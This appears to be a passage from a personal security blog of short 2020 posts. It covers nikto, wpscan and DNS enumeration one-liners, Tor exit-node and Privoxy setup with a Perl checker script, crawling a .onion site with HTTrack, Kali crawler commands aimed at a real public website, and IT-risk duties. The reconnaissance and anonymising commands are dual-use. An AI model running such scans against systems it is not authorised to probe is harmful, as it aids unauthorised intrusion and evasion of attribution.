target=10.0.0.1; nikto -h http://$target:80 | tee $target-nikto
target=10.0.0.1; wpscan --url http://$target:80 --enumerate u,t,p | tee $target-wpscan-enum

[dns][reconnaissance] DNS Enumeration updated on 20200128

whois domain.com
dnsrecon -d domain.com
dnsenum domain.com
gobuster -m dns -t 100 -u domain.com -w /usr/share/wordlists/metasploit/namelist.txt

Monday, January 27, 2020

[Tor]Specify the Exit Node of Tor

#vi /etc/tor/torrc
Add the following two lines on the very bottom:
ExitNodes {br}
StrictNodes 1
:wq
#/etc/init.d/tor restart

Among others, the br above, representing Brazil, is a country code. By using this way, we can confine the exit node in Brazil.
In terms of more country codes, you can refer to:
https://en.wikipedia.org/wiki/Country_code_top-level_domain

Sunday, January 26, 2020

A Snort-alike SIEM called Sagan

https://github.com/beave/sagan

A network hidden script through Tor and Privoxy

#!/usr/bin/perl -w
$|=1;

if( -e '/etc/init.d/tor'){
print "Tor: Installed!\n";
}else{
die "Tor: Not installed! Please install Tor through \'apt-get update\; apt-get install tor\'!\n";
}

print "Starting Tor...\n";
system('/etc/init.d/tor start 2>/dev/null');

sleep(2);

print "Check Tor\'s status...";
$output=sprintf(`netstat -anteup|grep tor|grep \'127.0.0.1:9050\'|wc -l`);
chop($output);
if($output==1){
print "ok!\n";
}else{
die "failed!\n";
}

if ( -e '/etc/init.d/privoxy'){
print "Privoxy: Installed!\n";
}else{
die "Privoxy: Not installed! Please install Privoxy through \'apt-get update\; apt-get install privoxy\'!\n";
}

print "Checking Privoxy\'s configuration...\n";
$output=sprintf(`cat /etc/privoxy/config|grep forward-socks5|grep -v \'#\'|wc -l`);
chop($output);
if($output==0){
die "forward-socks5 has been tweaked yet!\n";
}
$output=sprintf(`cat /etc/privoxy/config|grep \'\\[::1\\]:8118\'|grep -v \'#\'|wc -l`);
chop($output);
if($output!=0){
die "listen-address IPv6 has not been disabled yet!\n";
}
print "Complete!\n";

print "Starting Privoxy...\n";
system('/etc/init.d/privoxy start 2>/dev/null');

sleep(2);

print "Check Privoxy\'s status...";
$output=sprintf(`netstat -anteup|grep \'127.0.0.1:8118\'|wc -l`);
chop($output);
if($output==1){
print "ok!\n";
}else{
die "failed!\n";
}

print <<EndOutput;

HTTP/S Proxy: 127.0.0.1:8118
Socks5 Proxy: 127.0.0.1:9050

EndOutput

exit(0);

Monday, January 20, 2020

Common activities of IT Risk Practitioner

According to <Risk Management Policy>: Carry out IT Risk Assessment annually.
According to <Risk Management Policy>: Maintain Risk Assessment ledger, Risk Register records, KRI list, and Risk Appetite.
According to <Risk Management Policy>: Periodically generate IT Risk Monitoring report so that Management could oversee risks in a real-time manner.
According to <Change Management Procedure>: Oversee Change Risks during Change Management progress as a SME.
According to <Project Management Policy>: Oversee project Risks during Project Management progress as a SME.
According to <Third-party Management Policy>: Oversee Third-party Risks during Third-party management progress as a SME. Check Master Agreements and SOWs and ensure that remediations of IT Risk are covered.
According to <System Management Policy>: During Requirement Specification documentation period, maintain a System Security Requirement template and ensure that the template is able to integrated into each Requirement Specification document.
According to <System Management Policy>: During System Design and Implementation phases, launch Threat Modeling in order to uncover system risks in advance.
According to <System Management Policy>: During UAT phase, coordinate with project teams to complete those IT Risk-related test cases.

Wednesday, January 15, 2020

Utilize HTTrack to crawl Dark Web

Utilize HTTrack to crawl Dark Web
Reference: http://www.httrack.com/html/httrack.man.html


Install Tor:
#apt-get update
#apt-get install tor


Install HTTrack:
#apt-get install httrack


Install Privoxy:
#apt-get install privoxy


Some Preparation:
#mkdir -p /usr/local/sbin/httrack_log
#vi /etc/privoxy/config
---------------------------------
#Uncomment the following line:
     forward-socks5t  /  127.0.0.1:9050 .
#And comment the following line:
#listen-address [::1]:8118
#:wq!
---------------------------------


Lauch a scan:
#/etc/init.d/tor start
#/etc/init.d/privoxy start
#httrack "http://gdaqpaukrkqwjop6.onion/" -O "/usr/local/sbin/httrack_log" "+gdaqpaukrkqwjop6.onion/*" -v -P 127.0.0.1:8118 -s0

Tuesday, January 14, 2020

Three common web crawlers running under Kali Linux

1) SkipFish
#mkdir -p /usr/local/sbin/skipfish_log; skipfish -o /usr/local/sbin/skipfish_log http://www.163.com; tree -a /usr/local/sbin/skipfish_log; grep -nR test /usr/local/sbin/skipfish_log

2) Metasploit
msf5>use auxiliary/crawler/msfcrawler

3) HTTrack
#mkdir -p /usr/local/sbin/httrack_log; httrack http://www.163.com -O /usr/local/sbin/httrack_log; tree -a /usr/local/sbin/httrack_log; grep -nR test /usr/local/sbin/httrack_log

A list of Firewall Auditing manufacturers

https://www.firemon.com/products/policy-optimizer/
https://www.algosec.com/firewall-analyzer/
https://www.manageengine.com/products/firewall/firewall-compliance-management.html
https://www.tufin.com/features/compliance-audit-readiness
https://www.skyboxsecurity.com/products/skybox-firewall-assurance
https://www.titania.com/products/nipper/
https://www.solarwinds.com/free-tools/firewall-browser (free & commercial)
https://www.niiconsulting.com/Firesec.html
https://www.wallparse.com/ (free)